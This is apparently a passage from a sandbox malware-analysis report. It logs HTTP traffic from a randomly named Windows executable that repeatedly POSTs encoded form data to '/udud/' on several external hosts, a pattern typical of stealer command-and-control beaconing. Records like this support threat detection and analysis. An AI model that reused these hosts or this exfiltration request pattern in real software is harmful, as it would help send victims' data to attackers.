                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                Content-Encoding: br
                                                                                                Data Raw: 38 66 0d 0a a1 18 06 00 20 06 cc ab af a4 5b 28 73 84 1c 85 17 6c 79 e0 f0 97 74 45 61 16 24 92 74 b3 81 0d 70 38 8c e7 3c 7c ae 4d 8a b1 2b e9 23 92 66 62 94 5d 6a 81 70 41 5a e9 a1 67 c0 a8 71 7b 56 69 d3 a5 0c 31 7d 73 14 43 d3 56 5c 79 30 3f d7 8b 6c 17 21 bc 41 60 04 c4 f7 0f 3a cc b7 68 b1 45 38 e3 2e e6 27 9e 1b 2b ef 8d 1b 2b 13 e2 43 2e 7b 1d e2 6a 7c 9e e0 6a 29 ff fe 8d db fd 03 d9 8a 5f 2f 90 17 94 48 3f b0 81 6a 22 cd 86 09 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 8f [(slytEa$tp8<|M+#fb]jpAZgq{Vi1}sCV\y0?l!A`:hE8.'++C.{j|j)_/H?j"0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                80192.168.11.3049910116.203.164.244807584C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                May 27, 2024 12:36:54.206783056 CEST1682OUTPOST /udud/ HTTP/1.1
                                                                                                Host: www.wp-bits.online
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Origin: http://www.wp-bits.online
                                                                                                Referer: http://www.wp-bits.online/udud/
                                                                                                Content-Length: 1141
                                                                                                Cache-Control: max-age=0
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                                Data Raw: 50 6c 39 50 38 6c 64 58 3d 41 61 6e 53 6d 53 32 52 61 63 69 6d 42 48 41 38 77 33 48 42 36 41 37 51 6e 50 71 61 65 31 51 54 63 45 4a 68 77 5a 73 4c 62 32 31 4f 4c 61 35 4b 34 5a 47 72 44 5a 56 47 6e 7a 73 38 55 59 67 63 68 79 55 59 2f 41 74 74 38 45 56 4f 53 75 61 74 71 56 65 4e 73 71 41 4f 49 5a 64 6d 45 32 70 50 74 4a 6a 62 77 51 78 53 75 76 51 58 38 73 4c 50 50 67 6c 48 35 45 45 4d 4a 54 68 35 61 4e 7a 72 30 6c 49 36 30 43 70 55 2f 2b 36 73 6b 68 67 50 49 77 69 58 58 46 44 7a 63 6c 66 44 69 58 47 4a 64 68 74 4c 33 49 38 5a 7a 4d 70 75 61 50 79 34 48 48 4f 43 33 31 39 49 33 30 2b 36 4a 41 2f 6b 57 45 49 45 4c 41 45 68 34 38 2b 56 63 55 53 50 6d 4a 54 63 53 69 58 30 5a 6d 5a 6f 70 2f 78 56 7a 42 65 72 72 6a 4f 55 6a 59 66 76 69 49 52 34 56 78 2b 56 69 47 6b 43 46 44 6e 47 51 33 50 73 55 53 78 2b 44 6a 31 57 38 58 37 30 44 50 4e 75 76 6b 39 4a 71 54 4a 49 53 6f 4b 43 46 48 55 6d 68 42 31 37 33 47 36 52 39 6e 35 65 68 75 49 32 58 55 4c 75 52 73 4d 4e 46 68 65 7a 39 62 77 4c 77 2b 56 6b 2b 49 31 7a 54 [TRUNCATED]
                                                                                                Data Ascii: Pl9P8ldX=AanSmS2RacimBHA8w3HB6A7QnPqae1QTcEJhwZsLb21OLa5K4ZGrDZVGnzs8UYgchyUY/Att8EVOSuatqVeNsqAOIZdmE2pPtJjbwQxSuvQX8sLPPglH5EEMJTh5aNzr0lI60CpU/+6skhgPIwiXXFDzclfDiXGJdhtL3I8ZzMpuaPy4HHOC319I30+6JA/kWEIELAEh48+VcUSPmJTcSiX0ZmZop/xVzBerrjOUjYfviIR4Vx+ViGkCFDnGQ3PsUSx+Dj1W8X70DPNuvk9JqTJISoKCFHUmhB173G6R9n5ehuI2XULuRsMNFhez9bwLw+Vk+I1zTB4YnO6frcIjxNAzVnVnv7jcoHDFlfm/w/mZb6cK/IcWT7qRaW4uw6NSlY1UlEVoVJ9aOlY9Fr9sMdJZUxDpA8KkFzadMb44gmPFtO14+iwSnSXvajGEbM1rJb42Ob4FKQ5YBASBClNbnOFw5eUP2Vn79MPYPuF24q93MD3oT7LJS6EzE/z1Q2vypKqYwcoFeKoewWkpVVQ+LcaeugZtuLpmlvWOCO2NAwkEjKKcdFew23H8VYxEatXcJFf9l90Jdp4/omAhlKaCpMK8GKXpRuYJ+lAsG6geluqzps9+r0dzZval7MeoS808Ha1wY/MBgYFztCGbErOS/z96j7Gd7vOweM3lbwu3XhTihGNojViqVJHky9I9SY2NwCvsY8c2iZrIuLh2uVleNI9380JXwe78HjZhi7MyslE4VD7q9rohuM2Nkq04jPbA3cHNN9Q6AB0e0rouzNvS5omDlzrUJkPmvj+4MWhBJkM847mJlgAouob43TF8PavqNNKWP5IECDMRiM28FLtMW4iWh3GT2KJ5wxA48mCMW8uwrCV0Ie73/Ic7MvHJajOsqnewokMSlnb+8+7oiE/XC0URxTmVxXn2Lx5d39BhEPJatltXVdgzgQjJY7WvmKM+v+81XMN8ohXZVXseGc6nECuedysjFanJzKRYqLzCfxa [TRUNCATED]
                                                                                                May 27, 2024 12:36:54.405515909 CEST346INHTTP/1.1 404 Not Found
                                                                                                Server: nginx
                                                                                                Date: Mon, 27 May 2024 10:36:54 GMT
                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                Content-Encoding: br
                                                                                                Data Raw: 38 66 0d 0a a1 18 06 00 20 06 cc ab af a4 5b 28 73 84 1c 85 17 6c 79 e0 f0 97 74 45 61 16 24 92 74 b3 81 0d 70 38 8c e7 3c 7c ae 4d 8a b1 2b e9 23 92 66 62 94 5d 6a 81 70 41 5a e9 a1 67 c0 a8 71 7b 56 69 d3 a5 0c 31 7d 73 14 43 d3 56 5c 79 30 3f d7 8b 6c 17 21 bc 41 60 04 c4 f7 0f 3a cc b7 68 b1 45 38 e3 2e e6 27 9e 1b 2b ef 8d 1b 2b 13 e2 43 2e 7b 1d e2 6a 7c 9e e0 6a 29 ff fe 8d db fd 03 d9 8a 5f 2f 90 17 94 48 3f b0 81 6a 22 cd 86 09 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 8f [(slytEa$tp8<|M+#fb]jpAZgq{Vi1}sCV\y0?l!A`:hE8.'++C.{j|j)_/H?j"0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                81192.168.11.3049911116.203.164.244807584C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                May 27, 2024 12:36:56.923016071 CEST477OUTGET /udud/?pzH0=GNw0Cp4PdpF&Pl9P8ldX=NYPylna2Z9eGKk0n2zL98jmopuuDXUwTW1hg/NJ4dH1aG6U36Zymeq8Q+jA5ULsRtwMU5Sxc1U1KJPrtknew8LZ9GrpjSEZ/84zq63NvruY/sq3UYTRA7EE= HTTP/1.1
                                                                                                Host: www.wp-bits.online
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                                May 27, 2024 12:36:57.118632078 CEST359INHTTP/1.1 404 Not Found
                                                                                                Server: nginx
                                                                                                Date: Mon, 27 May 2024 10:36:57 GMT
                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                Content-Length: 196
                                                                                                Connection: close
                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                82192.168.11.3049912185.215.4.19807584C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                May 27, 2024 12:37:02.912525892 CEST748OUTPOST /udud/ HTTP/1.1
                                                                                                Host: www.academynadpo.ru
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Origin: http://www.academynadpo.ru
                                                                                                Referer: http://www.academynadpo.ru/udud/
                                                                                                Content-Length: 205
                                                                                                Cache-Control: max-age=0
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                                Data Raw: 50 6c 39 50 38 6c 64 58 3d 6f 7a 69 6f 30 4a 32 62 65 4d 35 50 72 4a 4c 4a 72 34 67 6c 39 68 47 48 2f 48 30 56 6e 67 6a 4a 79 64 34 56 2f 57 63 4b 63 34 62 59 41 76 6f 5a 42 38 63 4e 32 69 52 4a 39 32 50 6d 35 4d 43 79 57 56 55 57 70 48 39 75 6c 77 74 36 73 42 6e 2b 64 63 6f 59 44 2b 57 4d 6c 6c 74 57 52 52 39 67 78 4b 48 4b 33 37 57 4f 57 46 62 58 47 32 54 39 5a 57 44 31 7a 73 6e 45 4e 69 64 6b 68 68 49 73 57 55 37 6f 36 79 58 57 45 6b 52 4b 4b 43 78 4e 43 54 2b 58 54 4e 54 71 65 4a 75 65 54 2f 52 71 79 59 54 68 36 78 65 36 4a 59 73 68 4a 49 43 39 2b 31 49 41 49 4a 78 4e 4e 53 74 6a 47 73 78 43 75 67 3d 3d
                                                                                                Data Ascii: Pl9P8ldX=ozio0J2beM5PrJLJr4gl9hGH/H0VngjJyd4V/WcKc4bYAvoZB8cN2iRJ92Pm5MCyWVUWpH9ulwt6sBn+dcoYD+WMlltWRR9gxKHK37WOWFbXG2T9ZWD1zsnENidkhhIsWU7o6yXWEkRKKCxNCT+XTNTqeJueT/RqyYTh6xe6JYshJIC9+1IAIJxNNStjGsxCug==
                                                                                                May 27, 2024 12:37:03.197293997 CEST751INHTTP/1.1 404 Not Found
                                                                                                Server: ddos-guard
                                                                                                Connection: close
                                                                                                Set-Cookie: __ddg1_=zPvOw6oaeNZcJ75G881l; Domain=.academynadpo.ru; HttpOnly; Path=/; Expires=Tue, 27-May-2025 10:37:02 GMT
                                                                                                Date: Mon, 27 May 2024 10:37:00 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Content-Length: 340
                                                                                                Last-Modified: Tue, 29 May 2018 17:41:27 GMT
                                                                                                ETag: "154-56d5bbe607fc0"
                                                                                                Accept-Ranges: bytes
                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 3c 74 69 74 6c 65 3e 54 69 6c 64 61 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 65 65 3b 22 3e 3c 74 61 62 6c 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 31 30 30 25 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 22 3e 3c 74 72 3e 3c 74 64 20 73 74 79 6c 65 3d 22 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 6d 69 64 64 6c 65 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 69 6c 64 61 2e 63 63 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 2f 74 69 6c 64 61 2e 77 73 2f 69 6d 67 2f 6c 6f 67 6f 34 30 34 2e 70 6e 67 22 20 62 6f 72 64 65 72 3d 22 30 22 20 61 6c 74 3d 22 54 69 6c 64 61 22 20 2f 3e 3c 2f 61 3e 3c 2f 74 64 3e 3c 2f 74 72 3e 3c 2f 74 61 62 6c 65 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                Data Ascii: <html><head><meta name="robots" content="noindex"><title>Tilda</title></head><body style="background-color:#eee;"><table style="width:100%; height:100%;"><tr><td style="vertical-align: middle; text-align: center;"><a href="https://tilda.cc"><img src="//tilda.ws/img/logo404.png" border="0" alt="Tilda" /></a></td></tr></table></body></html>


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                83192.168.11.3049913185.215.4.19807584C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                May 27, 2024 12:37:05.560663939 CEST768OUTPOST /udud/ HTTP/1.1
                                                                                                Host: www.academynadpo.ru
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Origin: http://www.academynadpo.ru
                                                                                                Referer: http://www.academynadpo.ru/udud/
                                                                                                Content-Length: 225
                                                                                                Cache-Control: max-age=0
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                                Data Raw: 50 6c 39 50 38 6c 64 58 3d 6f 7a 69 6f 30 4a 32 62 65 4d 35 50 72 71 44 4a 6e 36 49 6c 37 42 47 45 36 48 30 56 75 41 6a 4e 79 64 30 56 2f 53 4e 52 64 4b 76 59 41 4c 6b 5a 54 4a 77 4e 31 69 52 4a 6c 6d 50 6e 39 4d 43 31 57 56 49 30 70 47 52 75 6c 32 42 36 73 41 58 2b 64 76 41 58 46 75 57 5a 77 31 74 55 66 78 39 67 78 4b 48 4b 33 37 53 67 57 45 2f 58 48 47 6a 39 57 55 72 32 37 4d 6e 46 49 53 64 6b 6c 68 49 67 57 55 37 65 36 33 2f 73 45 67 68 4b 4b 43 42 4e 43 43 2b 55 5a 4e 54 73 51 70 76 75 61 39 49 54 36 71 36 58 70 51 75 43 46 4b 35 63 4d 66 7a 6e 6a 32 38 43 62 70 4e 67 52 54 41 4c 45 75 77 5a 7a 69 79 43 47 35 52 5a 4c 35 61 50 4c 4c 57 45 6a 4b 46 6b 68 31 34 3d
                                                                                                Data Ascii: Pl9P8ldX=ozio0J2beM5PrqDJn6Il7BGE6H0VuAjNyd0V/SNRdKvYALkZTJwN1iRJlmPn9MC1WVI0pGRul2B6sAX+dvAXFuWZw1tUfx9gxKHK37SgWE/XHGj9WUr27MnFISdklhIgWU7e63/sEghKKCBNCC+UZNTsQpvua9IT6q6XpQuCFK5cMfznj28CbpNgRTALEuwZziyCG5RZL5aPLLWEjKFkh14=
                                                                                                May 27, 2024 12:37:05.831618071 CEST751INHTTP/1.1 404 Not Found
                                                                                                Server: ddos-guard
                                                                                                Connection: close
                                                                                                Set-Cookie: __ddg1_=K5CgOExyh7s2WfkrXWiR; Domain=.academynadpo.ru; HttpOnly; Path=/; Expires=Tue, 27-May-2025 10:37:05 GMT
                                                                                                Date: Mon, 27 May 2024 10:37:03 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Content-Length: 340
                                                                                                Last-Modified: Tue, 29 May 2018 17:41:27 GMT
                                                                                                ETag: "154-56d5bbe607fc0"
                                                                                                Accept-Ranges: bytes
                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 3c 74 69 74 6c 65 3e 54 69 6c 64 61 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 65 65 3b 22 3e 3c 74 61 62 6c 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 31 30 30 25 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 22 3e 3c 74 72 3e 3c 74 64 20 73 74 79 6c 65 3d 22 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 6d 69 64 64 6c 65 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 69 6c 64 61 2e 63 63 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 2f 74 69 6c 64 61 2e 77 73 2f 69 6d 67 2f 6c 6f 67 6f 34 30 34 2e 70 6e 67 22 20 62 6f 72 64 65 72 3d 22 30 22 20 61 6c 74 3d 22 54 69 6c 64 61 22 20 2f 3e 3c 2f 61 3e 3c 2f 74 64 3e 3c 2f 74 72 3e 3c 2f 74 61 62 6c 65 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                Data Ascii: <html><head><meta name="robots" content="noindex"><title>Tilda</title></head><body style="background-color:#eee;"><table style="width:100%; height:100%;"><tr><td style="vertical-align: middle; text-align: center;"><a href="https://tilda.cc"><img src="//tilda.ws/img/logo404.png" border="0" alt="Tilda" /></a></td></tr></table></body></html>


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                84192.168.11.3049914185.215.4.19807584C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                May 27, 2024 12:37:08.216242075 CEST1685OUTPOST /udud/ HTTP/1.1
                                                                                                Host: www.academynadpo.ru
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Origin: http://www.academynadpo.ru
                                                                                                Referer: http://www.academynadpo.ru/udud/
                                                                                                Content-Length: 1141
                                                                                                Cache-Control: max-age=0
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                                Data Raw: 50 6c 39 50 38 6c 64 58 3d 6f 7a 69 6f 30 4a 32 62 65 4d 35 50 72 71 44 4a 6e 36 49 6c 37 42 47 45 36 48 30 56 75 41 6a 4e 79 64 30 56 2f 53 4e 52 64 4b 33 59 44 34 73 5a 42 65 45 4e 30 69 52 4a 74 47 50 63 39 4d 43 6f 57 56 51 77 70 48 73 54 6c 31 31 36 74 6d 44 2b 66 65 41 58 4c 75 57 5a 6f 46 74 56 52 52 39 78 78 4f 62 4f 33 37 43 67 57 45 2f 58 48 45 37 39 66 6d 44 32 32 73 6e 45 4e 69 64 34 68 68 49 4d 57 51 57 72 36 33 36 54 48 54 70 4b 4b 69 52 4e 41 30 53 55 45 64 54 75 64 4a 76 32 61 39 30 79 36 72 58 6f 70 54 79 6f 46 4e 56 63 4d 70 2b 46 34 6d 41 4e 4a 76 64 7a 5a 53 6f 6b 4c 39 55 32 79 77 57 65 41 71 4e 5a 4a 62 43 63 43 64 4f 59 34 35 4e 2f 38 43 67 6c 75 75 74 65 4e 53 43 6e 6f 41 45 58 35 67 72 31 6e 39 76 4c 76 33 33 69 68 57 59 50 50 49 41 68 67 49 34 67 58 49 58 31 64 4b 32 44 45 50 4c 76 58 45 4a 76 77 47 4c 47 59 66 55 79 70 37 42 37 6d 51 65 53 76 4b 64 33 51 59 42 49 54 41 6a 67 30 61 56 35 70 79 31 79 68 2f 57 2b 37 73 55 48 4a 47 34 35 71 42 46 31 50 6b 75 6e 46 72 49 55 72 [TRUNCATED]
                                                                                                Data Ascii: Pl9P8ldX=ozio0J2beM5PrqDJn6Il7BGE6H0VuAjNyd0V/SNRdK3YD4sZBeEN0iRJtGPc9MCoWVQwpHsTl116tmD+feAXLuWZoFtVRR9xxObO37CgWE/XHE79fmD22snENid4hhIMWQWr636THTpKKiRNA0SUEdTudJv2a90y6rXopTyoFNVcMp+F4mANJvdzZSokL9U2ywWeAqNZJbCcCdOY45N/8CgluuteNSCnoAEX5gr1n9vLv33ihWYPPIAhgI4gXIX1dK2DEPLvXEJvwGLGYfUyp7B7mQeSvKd3QYBITAjg0aV5py1yh/W+7sUHJG45qBF1PkunFrIUrA8f26I2AAgmBp99t1oqmAbmMiT42T1nyG881n/paGnErxnv8Jps4sWjjPdWPaMyPoyqopidiPwps3qMncVT6ckRJW1mv2e7g/UM0XBbyAgH+C6lgi2lsLcd24Tq5o76rx0u8iycQtiYndWzERqq22aXHYcBtDLGDf4UfFryFQuFTr+ES+ve16AVwAWuULVJqD2GGDMjkr7syw6xJQfPlzCYGzE9RZn7MVIj2wSm5ZX7MSgp7W24z2l1KfGnNRr+8zIIMF45C+m1vK+X3CQCjb+2JZRvsBDhPVNIsiLJETrrrwKPXs+hxHsh0gTZIP71YiEofaJV1TZ8TLnaBEwCukGhUA0EjKf9i9RV/7DyDDURP0zwftPiCFmoNoPu4A+XCtsILZARm+9S0EGmSxYWCCW6rHvUu4ZaH1KiR9FYBGjI7HyyWrfXN1RhmljHl2jMnNVIZmNdw4gekC6DTURo65LZkIyZVeJ+siU1Qa5rqXUlh/YP9K9u0/9TQfHCNIoLHLqKQk24u71rMyHVoSoc69dipKbLJPp7yTaRVpyK6f5Mmuch+Fx5367q6qCIOeXQvc+Zn50tz3TSsbtZtgpEQPBt/EawAxJM6H1L53UUXow+gYysnaY49lsX6TFPJKfPzal4hRjgxSdDd32ZM+zrwzv0YIucSbBV5Hu [TRUNCATED]
                                                                                                May 27, 2024 12:37:08.470360041 CEST751INHTTP/1.1 404 Not Found
                                                                                                Server: ddos-guard
                                                                                                Connection: close
                                                                                                Set-Cookie: __ddg1_=OodH06pAccMziIHJU52H; Domain=.academynadpo.ru; HttpOnly; Path=/; Expires=Tue, 27-May-2025 10:37:08 GMT
                                                                                                Date: Mon, 27 May 2024 10:37:08 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Content-Length: 340
                                                                                                Last-Modified: Tue, 29 May 2018 17:41:27 GMT
                                                                                                ETag: "154-56d5bbe607fc0"
                                                                                                Accept-Ranges: bytes
                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 3c 74 69 74 6c 65 3e 54 69 6c 64 61 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 65 65 3b 22 3e 3c 74 61 62 6c 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 31 30 30 25 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 22 3e 3c 74 72 3e 3c 74 64 20 73 74 79 6c 65 3d 22 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 6d 69 64 64 6c 65 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 69 6c 64 61 2e 63 63 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 2f 74 69 6c 64 61 2e 77 73 2f 69 6d 67 2f 6c 6f 67 6f 34 30 34 2e 70 6e 67 22 20 62 6f 72 64 65 72 3d 22 30 22 20 61 6c 74 3d 22 54 69 6c 64 61 22 20 2f 3e 3c 2f 61 3e 3c 2f 74 64 3e 3c 2f 74 72 3e 3c 2f 74 61 62 6c 65 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                Data Ascii: <html><head><meta name="robots" content="noindex"><title>Tilda</title></head><body style="background-color:#eee;"><table style="width:100%; height:100%;"><tr><td style="vertical-align: middle; text-align: center;"><a href="https://tilda.cc"><img src="//tilda.ws/img/logo404.png" border="0" alt="Tilda" /></a></td></tr></table></body></html>


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                85192.168.11.3049915185.215.4.19807584C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                May 27, 2024 12:37:10.871109009 CEST478OUTGET /udud/?Pl9P8ldX=lxKI396dcfUopLOCgIwHig2W2DxUvRX97MJRzioDZqj6Mq9AZ90i2wJz7BzjxOGPWVxSz39xtFFcwgb3QegZat7wpytzNwJDmdPz0ImKOxyDMBvGUlbFyek=&pzH0=GNw0Cp4PdpF HTTP/1.1
                                                                                                Host: www.academynadpo.ru
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                                May 27, 2024 12:37:11.128859997 CEST1149INHTTP/1.1 404 Not Found
                                                                                                Server: ddos-guard
                                                                                                Connection: close
                                                                                                Set-Cookie: __ddg1_=LQ7ncvyPuVQcyFyOew5a; Domain=.academynadpo.ru; HttpOnly; Path=/; Expires=Tue, 27-May-2025 10:37:10 GMT
                                                                                                Date: Mon, 27 May 2024 10:37:11 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Content-Length: 738
                                                                                                Last-Modified: Sun, 11 Jun 2023 21:19:31 GMT
                                                                                                ETag: "2e2-5fde1286ba692"
                                                                                                Accept-Ranges: bytes
                                                                                                X-Frame-Options: SAMEORIGIN
